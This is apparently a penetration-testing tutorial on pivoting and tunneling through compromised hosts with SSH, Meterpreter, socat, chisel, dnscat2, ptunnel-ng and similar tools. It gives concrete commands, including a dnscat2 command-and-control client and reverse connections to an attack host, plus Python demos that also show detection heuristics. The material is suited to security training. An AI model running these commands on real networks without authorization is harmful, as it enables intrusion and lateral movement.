Pivoting, Tunneling, and Port Forwarding
Introduction
Pivoting is the technique of using an already compromised host to reach network segments that the attack host cannot route to directly. Once valid credentials (or a shell) are obtained on a machine that sits on both the reachable network and an isolated one, traffic destined for the isolated segment can be routed through that machine, so the assessment can continue beyond the first foothold.
Before diving into the techniques, let’s define the core terms:
Pivoting: Using a compromised host to access isolated networks, bypassing physical or virtual segmentation.
Tunneling: Encapsulating network traffic within another protocol to route it through a pivot host.
Port Forwarding: Redirecting traffic from one port to another, often used with tunneling to reach specific services.
A strong understanding of networking fundamentals (e.g., TCP/IP, routing, and firewalls) is essential for successful pivoting.
SSH Port Forwarding
SSH can be used for port forwarding in three forms, local, dynamic and remote, each carrying connections through an SSH session to or from a pivot host.
Local Port Forwarding
Local port forwarding binds a port on the attack machine and carries every connection to it through the SSH session to a service that is reachable from the pivot host. It is the right choice when you know exactly which ports you need to hit.
With -L 1234:localhost:3306, for example, SSH forwards local port 1234 to port 3306 on the pivot. The destination is resolved from the pivot's side, so localhost here means the pivot itself, and an internal address such as one in 172.16.5.0/23 would reach a host behind it. Several -L options can be given in one command to forward multiple ports over a single session.
Dynamic Port Forwarding
Dynamic port forwarding creates a SOCKS proxy on the attack host, so any destination the pivot can reach becomes available without knowing the target ports in advance. Start an SSH session with the -D flag, e.g. ssh -D 9050 <user>@<pivot-ip>. The -D flag enables a SOCKS listener on local port 9050, bound to 127.0.0.1 by default so other hosts on your network cannot use it. Configure Proxychains by adding the following line to /etc/proxychains.conf:
socks4 127.0.0.1 9050
Run commands through Proxychains by prefixing them, e.g. proxychains nmap -sT -Pn <internal-ip>. Proxychains only intercepts TCP connect() calls, so SYN scans, ICMP host discovery and UDP probes bypass the proxy entirely; use -sT -Pn with nmap and expect scans through the proxy to be slow.
Remote (Reverse) Port Forwarding
Remote port forwarding does the opposite: it opens a listening port on the pivot and carries connections to it back to the attack machine, which is what a reverse shell from an internal host needs when that host can reach only the pivot. Use the -R option, e.g. ssh -R <pivot-internal-ip>:8080:0.0.0.0:8000 <user>@<pivot-ip> -vN.
The -vN flags enable verbose output and prevent a login shell. This forwards traffic arriving on the pivot's port 8080 to the attack host's port 8000. By default sshd binds -R listeners to the pivot's loopback interface only; for internal hosts to reach port 8080, GatewayPorts must be set to yes or clientspecified in the pivot's sshd_config, otherwise the requested bind address is ignored and the port is not reachable from the internal network.
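The SOCKS listener that ssh -D provides and the connect() interception that Proxychains performs amount to a short handshake, and every port forward on this page (ssh -L, Meterpreter portfwd, Socat, netsh portproxy) comes down to the same byte relay. The following is an added example in Python, not code from this page or from any of the tools it names: a minimal SOCKS4 proxy and client that run entirely on loopback against a stand-in "internal service", so it can be run offline. The port numbers, the USERID string and the service reply are chosen for the illustration.

```python
"""What `ssh -D 9050` plus proxychains do on the wire: a tiny SOCKS4 proxy
and client, and the byte relay that every port forwarder is built on.
Added example, not code from the page or any tool it names; runs on loopback."""
from __future__ import annotations
import socket
import socketserver
import struct
import threading

SOCKS4_VERSION, CMD_CONNECT = 4, 1
GRANTED, REJECTED = 0x5A, 0x5B


def relay(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src->dst until src hits EOF, then half-close dst.
    Two of these (one per direction) are the core of socat, netsh portproxy
    and meterpreter portfwd alike."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        part = sock.recv(n - len(buf))
        if not part:
            raise ConnectionError("peer closed during SOCKS handshake")
        buf += part
    return buf


def socks4_request(dst_ip: str, dst_port: int, userid: bytes = b"pc") -> bytes:
    """SOCKS4 CONNECT request: VN=4, CD=1, DSTPORT, DSTIP, USERID, NUL."""
    return struct.pack("!BBH4s", SOCKS4_VERSION, CMD_CONNECT, dst_port,
                       socket.inet_aton(dst_ip)) + userid + b"\x00"


def socks4_connect(proxy: tuple[str, int], dst_ip: str, dst_port: int) -> socket.socket:
    """Open a TCP connection to dst via a SOCKS4 proxy; this is what
    proxychains does transparently inside every connect() it hooks."""
    s = socket.create_connection(proxy, timeout=5)
    s.sendall(socks4_request(dst_ip, dst_port))
    _, code, _, _ = struct.unpack("!BBH4s", recv_exact(s, 8))   # reply: VN=0, CD, port, ip
    if code != GRANTED:
        s.close()
        raise ConnectionError(f"SOCKS4 request refused, code 0x{code:02x}")
    return s


class Socks4Handler(socketserver.BaseRequestHandler):
    """Proxy side: parse one CONNECT, dial the destination, relay both ways.
    Plain SOCKS4 only: proxychains' proxy_dns uses the SOCKS4a extension
    (DSTIP 0.0.0.x plus a trailing hostname), which this toy does not implement."""

    def handle(self) -> None:
        vn, cd, port, ip = struct.unpack("!BBH4s", recv_exact(self.request, 8))
        while recv_exact(self.request, 1) != b"\x00":   # skip the USERID string
            pass
        if vn != SOCKS4_VERSION or cd != CMD_CONNECT:
            self.request.sendall(struct.pack("!BBH4s", 0, REJECTED, port, ip))
            return
        try:
            upstream = socket.create_connection((socket.inet_ntoa(ip), port), timeout=5)
        except OSError:
            self.request.sendall(struct.pack("!BBH4s", 0, REJECTED, port, ip))
            return
        self.request.sendall(struct.pack("!BBH4s", 0, GRANTED, port, ip))
        back = threading.Thread(target=relay, args=(upstream, self.request), daemon=True)
        back.start()
        relay(self.request, upstream)
        back.join()
        upstream.close()


class EchoHandler(socketserver.BaseRequestHandler):
    """Stand-in for a service that is reachable only from the pivot."""
    def handle(self) -> None:
        self.request.sendall(b"internal-svc:" + self.request.recv(1024))


class Server(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True


def demo() -> bytes:
    """Start the 'internal' service and the proxy on loopback, reach the
    service through the proxy, and return what it answered."""
    svc = Server(("127.0.0.1", 0), EchoHandler)
    proxy = Server(("127.0.0.1", 0), Socks4Handler)
    for srv in (svc, proxy):
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        s = socks4_connect(proxy.server_address, "127.0.0.1", svc.server_address[1])
        s.sendall(b"hello")
        answer = recv_exact(s, len(b"internal-svc:hello"))
        s.close()
    finally:
        for srv in (svc, proxy):
            srv.shutdown()
            srv.server_close()
    return answer


if __name__ == "__main__":
    print(demo())   # b'internal-svc:hello'
```

Running it prints b'internal-svc:hello'. The same handshake is what your tools perform against 127.0.0.1:9050 when Proxychains is configured as above; ssh -D additionally speaks SOCKS4a and SOCKS5, which is why both socks4 and socks5 lines work in proxychains.conf.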
Meterpreter Tunneling & Port Forwarding
Meterpreter, part of Metasploit, supports pivoting without SSH. Once a session is open on the pivot, add a route to the internal subnet through that session (the post/multi/manage/autoroute module, or route add <subnet> <netmask> <session-id> in msfconsole), then start the auxiliary/server/socks_proxy module. It binds a SOCKS listener on the attack host that Proxychains can use exactly like the ssh -D listener, with Metasploit routing the proxied connections through the session.
Meterpreter's portfwd command is the equivalent of ssh -L. portfwd add -l 3300 -p 3389 -r <target-ip> forwards local port 3300 to the target's port 3389. You can then RDP:
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
Reverse port forwarding is also possible, so that a listener on the compromised host hands connections back to the attack host:
portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
This opens port 1234 on the compromised host and forwards anything that connects to it to 10.10.14.18:8081 on the attack host. A multi/handler listening on 8081 then receives payloads from internal hosts that can only reach the pivot; such payloads use the pivot's internal address as LHOST and 1234 as LPORT.
Socat
Socat is a bidirectional relay tool for tunneling without SSH. Its general form for a port forward, run on the pivot, is socat TCP4-LISTEN:<listen-port>,fork TCP4:<target-ip>:<target-port>: every connection to the listening port is relayed to the target, and fork handles each client in its own process. The same shape serves a reverse shell (listen on the pivot, relay to the attack host's handler) and access to an internal service (listen on the pivot, relay to the internal host). Unlike SSH it adds no encryption, and the listening port is open to anyone who can reach the pivot.
Additional Tools
Plink.exe
Plink, the command-line SSH client that ships with PuTTY, gives the same dynamic forwarding from a Windows attack host:
plink -ssh -D 9050 ubuntu@10.129.15.50
Then configure Proxifier to route traffic through the SOCKS proxy at 127.0.0.1:9050.
Sshuttle
Sshuttle pivots over SSH without Proxychains: it installs firewall rules on the attack host that transparently redirect traffic for the given subnet into the SSH session, so unmodified tools just work. It needs root locally for those rules and Python on the pivot. Here -r names the pivot, 172.16.5.0/23 is the subnet to route through it and -v is verbose:
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v
Rpivot
Rpivot creates a reverse SOCKS proxy: the client runs on the pivot and connects out to a server on the attack host, which helps when the pivot can initiate connections but cannot accept them. On the attack host:
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
--server-port 9999 is where the pivot's client connects in, and --proxy-port 9050 is the resulting SOCKS listener. --server-ip 0.0.0.0 accepts the incoming rpivot connection from any address; bind it to the interface the pivot will use where possible. Transfer Rpivot to the target:
scp -r rpivot ubuntu@<IP-Address>:/home/ubuntu/
On the target, pointing the client at the attack host and the server port chosen above:
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
Then run commands:
curl --socks4 127.0.0.1:9050 172.16.5.135
Windows Netsh
Netsh, built into Windows, can turn a compromised Windows host into a port forwarder through its portproxy context. It requires an administrative shell, and the IP Helper service (iphlpsvc) must be running:
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25
This listens on 10.129.42.198:8080 (the pivot's address on the network the attack host can reach) and relays connections to 172.16.5.25:3389 on the internal network, so the attack host can RDP to the pivot's port 8080. You can verify using:
netsh.exe interface portproxy show v4tov4
Unlike an SSH tunnel, the rule persists across reboots (it is stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy), so remove it when done with netsh.exe interface portproxy delete v4tov4 listenport=8080 listenaddress=10.129.42.198. That registry key and netsh portproxy command lines are also what defenders look for.
DNS Tunneling with Dnscat2
Dnscat2 tunnels command-and-control data inside DNS queries and responses, which gets through networks where only DNS is allowed out. On the attack host, start the server for a domain you control (or, as here, a domain the client will query the attack host for directly):
sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
The server prints a pre-shared secret at startup; the client must supply the same value or the session is refused. --no-cache is needed when the PowerShell client is used, since it does not support the server's packet caching. On the target (Windows, using the dnscat2-powershell client), -DNSserver must point at the host running the dnscat2 server:
Start-Dnscat2 -DNSserver 10.10.15.111 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd
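Why a DNS tunnel works, and why it stands out in resolver logs, is easiest to see from the encoding itself. The following is an added example of the general mechanism dnscat2 relies on (data hex-encoded into labels under a domain the attacker answers for), written here in Python; it is not dnscat2's code or its exact wire format. The sequence-number label, the label budget and the sample payload are all invented for the illustration, and the domain is the one used on this page.

```python
"""How a DNS tunnel carries bytes in query names, and why it is easy to spot.
Added example of the general mechanism behind dnscat2, not its real format:
the sequence label and the sample payload are invented for this illustration."""
from __future__ import annotations
import math
from collections import Counter

MAX_LABEL = 63       # RFC 1035: a label is at most 63 octets
MAX_NAME = 253       # and a full name at most 253 characters in text form
HEX_PER_LABEL = 62   # even number of hex digits so every label holds whole bytes
DOMAIN = "inlanefreight.local"   # the domain used on this page


def encode_query_names(payload: bytes, domain: str = DOMAIN, seq: int = 0) -> list[str]:
    """Split payload into names of the form <seq>.<hex>.<hex>...<domain>,
    each within MAX_NAME; the number of hex labels per name is derived from
    the length budget left after the domain and the sequence label."""
    hexdata = payload.hex()
    budget = MAX_NAME - len(domain) - 1 - len(f"{seq:04x}.")
    labels_per_name = max(1, budget // (MAX_LABEL + 1))
    step = labels_per_name * HEX_PER_LABEL
    names = []
    for off in range(0, len(hexdata), step):
        piece = hexdata[off:off + step]
        labels = [piece[i:i + HEX_PER_LABEL] for i in range(0, len(piece), HEX_PER_LABEL)]
        names.append(f"{seq:04x}." + ".".join(labels) + "." + domain)
        seq += 1
    return names


def decode_query_names(names: list[str], domain: str = DOMAIN) -> bytes:
    """Server side: reassemble the payload from the queries it receives.
    Ordinary lookups under other domains are skipped, anything under ours
    that is not well-formed hex is ignored, and the sequence label handles
    queries that arrive out of order."""
    parts: dict[int, bytes] = {}
    for name in names:
        if not name.endswith("." + domain):
            continue
        seq_label, *hex_labels = name[: -len(domain) - 1].split(".")
        try:
            parts[int(seq_label, 16)] = bytes.fromhex("".join(hex_labels))
        except ValueError:
            continue   # not one of our frames
    return b"".join(parts[k] for k in sorted(parts))


def shannon_entropy(text: str) -> float:
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def looks_like_tunnel(name: str, domain: str = DOMAIN,
                      min_len: int = 50, min_entropy: float = 3.2) -> bool:
    """Detection heuristic a resolver log could apply: a very long,
    high-entropy subdomain is characteristic of encoded data, not hostnames."""
    sub = name[: -len(domain) - 1] if name.endswith("." + domain) else name
    return len(sub) >= min_len and shannon_entropy(sub) >= min_entropy


if __name__ == "__main__":
    sample = bytes(range(256)) * 2   # constructed payload standing in for shell output
    names = encode_query_names(sample)
    assert decode_query_names(names) == sample
    for n in names:
        print(len(n), looks_like_tunnel(n), n[:48] + "...")
```

Two things follow from the code: each query moves only a few hundred bytes, which is why DNS tunnels are slow, and every query has a long, random-looking subdomain under one zone, which is why a count of unique subdomains per domain, or an entropy check like looks_like_tunnel, catches them in DNS logs.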
SOCKS5 Tunneling with Chisel
Chisel tunnels TCP and UDP over HTTP (WebSocket) connections, encrypted with SSH, and ships as a single static binary for Linux and Windows. In forward mode the server runs on the pivot and the attack host connects to it. On the pivot target:
./chisel server -v -p 1234 --socks5
On the attack host:
./chisel client -v 10.129.202.64:1234 socks
The socks remote makes the client open a SOCKS5 listener on 127.0.0.1:1080 on the attack host. Update /etc/proxychains.conf:
socks5 127.0.0.1 1080
Note that forward mode exposes a chisel server, and with --socks5 a SOCKS proxy, on the pivot's port 1234 to anyone who can reach it; pass --auth user:pass on both ends if it has to stay up. For reverse tunneling, start the server on the attack host with --reverse (chisel server --reverse -v -p 1234 --socks5) and connect from the pivot with chisel client -v <attack-host-ip>:1234 R:socks. The SOCKS listener then appears on the attack host's 127.0.0.1:1080 while the pivot only makes an outbound connection, which is the better choice when the pivot is firewalled inbound.
ICMP Tunneling with Ptunnel-ng
Ptunnel-ng carries TCP connections inside ICMP echo request and reply packets, which works when a firewall lets ping through but blocks everything else; both ends need root for raw sockets. On the pivot, start the proxy:
sudo ./ptunnel-ng -r10.129.202.64 -R22
On the attack host, start the client: -p is the proxy (pivot) address, -l the local port to listen on, and -r/-R the destination host and port the proxy should connect to:
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
SSH through the tunnel:
ssh -p2222 -lubuntu 127.0.0.1
The resulting SSH session can carry dynamic forwarding like any other, giving a SOCKS proxy whose traffic ultimately rides on ICMP:
ssh -D 9050 -p2222 -lubuntu 127.0.0.1
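What an ICMP tunnel actually puts on the wire, and what a sensor sees, is worth seeing in code. The following is an added example in Python of the mechanism ptunnel-ng builds on; it is not ptunnel-ng's code, and the tunnel frame header (magic, tunnel id, sequence, length) and the sample payload are invented for the illustration, not ptunnel-ng's real format. Sending such packets needs a raw socket, which is why the commands above run under sudo; this block only builds, checksums and parses them, so it runs offline.

```python
"""TCP bytes inside ICMP Echo packets, the mechanism ptunnel-ng relies on.
Added example, not ptunnel-ng's code; the tunnel frame header is invented
for the illustration.  Builds and parses packets only (no raw sockets)."""
from __future__ import annotations
import struct

ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0
ICMP_HDR = struct.Struct("!BBHHH")     # type, code, checksum, identifier, sequence
TUN_HDR = struct.Struct("!IHHH")       # magic, tunnel id, sequence, payload length (invented)
TUN_MAGIC = 0xD5200880                 # hypothetical marker identifying our frames


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (zero-padded if odd).
    Over a whole packet with its checksum in place the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_icmp_echo(icmp_type: int, ident: int, seq: int, data: bytes) -> bytes:
    """ICMP header with the checksum computed over header plus data."""
    csum = inet_checksum(ICMP_HDR.pack(icmp_type, 0, 0, ident, seq) + data)
    return ICMP_HDR.pack(icmp_type, 0, csum, ident, seq) + data


def encapsulate(tcp_bytes: bytes, tunnel_id: int, seq: int,
                ident: int = 0x1234, reply: bool = False) -> bytes:
    """Wrap tcp_bytes in a tunnel frame inside an Echo Request (client->proxy)
    or an Echo Reply (proxy->client), so a stateful firewall sees ordinary ping."""
    frame = TUN_HDR.pack(TUN_MAGIC, tunnel_id, seq, len(tcp_bytes)) + tcp_bytes
    icmp_type = ICMP_ECHO_REPLY if reply else ICMP_ECHO_REQUEST
    return build_icmp_echo(icmp_type, ident, seq, frame)


def decapsulate(pkt: bytes) -> dict | None:
    """Verify checksum, type and magic; return the frame fields, or None so a
    stray real ping or a corrupted packet never reaches the TCP stream."""
    if len(pkt) < ICMP_HDR.size + TUN_HDR.size or inet_checksum(pkt) != 0:
        return None
    icmp_type, code, _, ident, seq = ICMP_HDR.unpack_from(pkt)
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY) or code != 0:
        return None
    magic, tunnel_id, _, length = TUN_HDR.unpack_from(pkt, ICMP_HDR.size)
    data = pkt[ICMP_HDR.size + TUN_HDR.size:]
    if magic != TUN_MAGIC or length != len(data):
        return None
    return {"type": icmp_type, "ident": ident, "seq": seq,
            "tunnel_id": tunnel_id, "data": data}


def suspicious_echo(pkt: bytes) -> bool:
    """Detection angle: stock ping payloads are small and patterned (Linux ping
    sends 56 bytes, a timestamp followed by 0x10..0x37; Windows sends 32 bytes
    of 'abcdefgh...').  Anything else, at volume, deserves a look."""
    data = pkt[ICMP_HDR.size:]
    linux_like = len(data) == 56 and data[16:] == bytes(range(0x10, 0x38))
    windows_like = data == b"abcdefghijklmnopqrstuvwabcdefghi"
    return not (linux_like or windows_like)


if __name__ == "__main__":
    pkt = encapsulate(b"SSH-2.0-OpenSSH_8.9\r\n", tunnel_id=7, seq=1)  # constructed sample
    print(pkt.hex())
    print(decapsulate(pkt), suspicious_echo(pkt))
```

The checksum check matters in practice: the pivot's proxy receives every echo packet addressed to it, including real pings, and must never feed those into a TCP stream. The payload-shape check is the mirror image for defenders: a burst of echo packets with large, variable payloads between two hosts is the signature of an ICMP tunnel.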
RDP Tunneling with SocksOverRDP
SocksOverRDP tunnels traffic over an existing RDP session using RDP dynamic virtual channels, which is useful when RDP is the only path into a Windows host. On the Windows machine you RDP from (as Administrator), register the client plugin:
regsvr32.exe SocksOverRDP-Plugin.dll
Then RDP to the target and run SocksOverRDP-Server.exe there. The plugin opens a SOCKS listener on 127.0.0.1:1080 on the RDP client machine; configure Proxifier to forward traffic to that address.